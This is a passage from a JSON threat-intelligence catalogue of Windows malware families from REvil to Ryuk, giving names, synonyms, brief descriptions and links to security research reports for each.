"https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/", "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/", "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/", "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80", "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/", "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://asec.ahnlab.com/ko/19860/", "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html", "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", "https://sites.temple.edu/care/ci-rw-attacks/", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/", "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.certego.net/en/news/malware-tales-sodinokibi/", "https://www.secureworks.com/blog/revil-the-gandcrab-connection", "https://hatching.io/blog/ransomware-part2", "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html", "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf", "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/", "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/", "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/", "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/", "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html", "https://community.riskiq.com/article/3315064b", "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/", "https://blog.amossys.fr/sodinokibi-malware-analysis.html", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/", "https://threatintel.blog/OPBlueRaven-Part1/", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://isc.sans.edu/diary/27012", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://securelist.com/sodin-ransomware/91473/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", "https://www.kpn.com/security-blogs/Tracking-REvil.htm", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/", "https://vimeo.com/449849549", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.youtube.com/watch?v=l2P5CMH9TE0", "https://www.grahamcluley.com/travelex-paid-ransom/", "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain", "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", "https://www.secureworks.com/research/revil-sodinokibi-ransomware", "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", "https://www.secureworks.com/research/threat-profiles/gold-southfield", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://asec.ahnlab.com/ko/19640/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/", "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/", "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos" ], "synonyms": [ "Sodin", "Sodinokibi" ], "type": [] }, "uuid": "e7698597-e0a9-4f4b-9920-09f5db225bd4", "value": "REvil" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/" ], "synonyms": [], "type": [] }, "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", "value": "RGDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino", "https://www.vmray.com/cyber-security-blog/rhino-ransomware-malware-analysis-spotlight/" ], "synonyms": [], "type": [] }, "uuid": "cff6ec82-9d14-4307-9b5b-c0bd17e62f2a", "value": "Rhino Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/" ], "synonyms": [], "type": [] }, "uuid": "5f1bac43-6506-43f0-b5d6-709a39abd671", "value": "RHttpCtrl" }, { "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/", "https://decoded.avast.io/threatintel/spoofing-in-the-reeds-with-rietspoof/", "https://blog.avast.com/rietspoof-malware-increases-activity" ], "synonyms": [], "type": [] }, "uuid": "ec67123a-c3bc-4f46-b9f3-569c19e224ca", "value": "Rietspoof" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf", "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" ], "synonyms": [], "type": [] }, "uuid": "2639b71e-1bf1-4cd2-8fa2-9498e893ef3f", "value": "Rifdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", "value": "Rikamanu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2011/Edwards-Nazario-VB2011.pdf" ], "synonyms": [], "type": [] }, "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", "value": "Rincux" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf" ], "synonyms": [], "type": [] }, "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", "value": "Ripper ATM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] }, "uuid": "148a7078-3a38-4974-8990-9d5881f8267b", "value": "Rising Sun" }, { "description": "CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as numerous smaller campaigns likely attributable to other, disparate, threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/", "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf", "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/" ], "synonyms": [ "Gussdoor", "Remote Manipulator System" ], "type": [] }, "uuid": "94339b04-9332-4691-b820-5021368f1d3a", "value": "RMS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/", "https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/", "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/", "https://goggleheadedhacker.com/blog/post/12", "https://twitter.com/VK_Intel/status/1121440931759128576", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [ "RobbinHood" ], "type": [] }, "uuid": "6f3469f6-7a56-4ba3-a340-f10746390226", "value": "RobinHood" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock" ], "synonyms": [ "yellowalbatross" ], "type": [] }, "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", "value": "rock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] }, "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", "value": "Rockloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" ], "synonyms": [], "type": [] }, "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", "value": "Rofin" }, { "description": "A .NET variant of ps1.roguerobin", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/" ], "synonyms": [], "type": [] }, "uuid": "25b08d2e-f803-4520-9518-4d95ce9f6ed4", "value": "RogueRobinNET" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku", "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", "value": "Rokku" }, { "description": "It is a backdoor commonly distributed as an encoded\r\nbinary file downloaded and decrypted by shellcode following the\r\nexploitation of weaponized documents. DOGCALL is capable of\r\ncapturing screenshots, logging keystrokes, evading analysis with\r\nanti-virtual machine detections, and leveraging cloud storage APIs\r\nsuch as Cloud, Box, Dropbox, and Yandex.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", "https://www.ibm.com/downloads/cas/Z81AVOY7", "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "https://www.youtube.com/watch?v=uoBQE5s2ba4", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "http://v3lo.tistory.com/24", "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" ], "synonyms": [ "DOGCALL" ], "type": [] }, "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", "value": "RokRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", "http://blogs.cisco.com/security/talos/rombertik" ], "synonyms": [ "CarbonGrabber" ], "type": [] }, "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", "value": "Rombertik" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" ], "synonyms": [], "type": [] }, "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", "value": "Romeo(Alfa,Bravo, ...)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" ], "synonyms": [], "type": [] }, "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", "value": "Roopirs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" ], "synonyms": [], "type": [] }, "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", "value": "Roseam" }, { "description": "Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt", "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html", "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/" ], "synonyms": [ "RotoCrypt", "Rotor" ], "type": [] }, "uuid": "f20ef9a8-6ffc-4ef2-98ba-44f6b2eab966", "value": "RotorCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/", "https://securelist.com/apt-trends-report-q3-2020/99204/" ], "synonyms": [], "type": [] }, "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", "value": "Rover" }, { "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", "https://securelist.com/oh-what-a-boot-iful-mornin/97365" ], "synonyms": [ "BkLoader", "Cidox", "Mayachok" ], "type": [] }, "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", "value": "Rovnix" }, { "description": "RoyalCli is a backdoor which appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary. RoyalCli and BS2005 both communicate with the attacker's command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", "https://github.com/nccgroup/Royal_APT", "https://www.secureworks.com/research/threat-profiles/bronze-palace", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", "value": "RoyalCli" }, { "description": "RoyalDNS is a DNS based backdoor used by APT15 that persistences on a system through a service called 'Nwsapagent'.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", "https://github.com/nccgroup/Royal_APT", "https://www.secureworks.com/research/threat-profiles/bronze-palace", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", "value": "Royal DNS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" ], "synonyms": [], "type": [] }, "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", "value": "Rozena" }, { "description": "RTM Banker also known as Redaman was first blogged about in February 2017 by ESET. The malware is written in Delphi and shows some similarities (like process list) with Buhtrap. It uses a slightly modified version of RC4 to encrypt its strings, network data, configuration and modules, according to ESET.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", "https://www.youtube.com/watch?v=YXnNO3TipvM", "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", "http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html", "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" ], "synonyms": [ "Redaman" ], "type": [] }, "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", "value": "RTM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf" ], "synonyms": [], "type": [] }, "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", "value": "rtpos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" ], "synonyms": [], "type": [] }, "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", "value": "Ruckguv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" ], "synonyms": [], "type": [] }, "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", "value": "Rumish" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat" ], "synonyms": [], "type": [] }, "uuid": "b746a645-5974-44db-a811-a024214b7fba", "value": "running_rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" ], "synonyms": [ "RCSU" ], "type": [] }, "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", "value": "Rurktar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", "https://www.secureworks.com/blog/research-21041", "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/" ], "synonyms": [], "type": [] }, "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", "value": "Rustock" }, { "description": "Ryuk is a ransomware which encrypts its victim's files and asks for a ransom via bitcoin to release the original files. It is has been observed being used to attack companies or professional environments. Cybersecurity experts figured out that Ryuk and Hermes ransomware shares pieces of codes. Hermes is commodity ransomware that has been observed for sale on dark-net forums and used by multiple threat actors. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/", "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/", "https://community.riskiq.com/article/0bcefe76", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/", "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html", "https://twitter.com/ffforward/status/1324281530026524672", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://twitter.com/anthomsec/status/1321865315513520128", "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/", "https://blog.reversinglabs.com/blog/hunting-for-ransomware", "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/", "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html", "https://www.scythe.io/library/threatthursday-ryuk", "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html", "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/", "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/", "https://sites.temple.edu/care/ci-rw-attacks/", 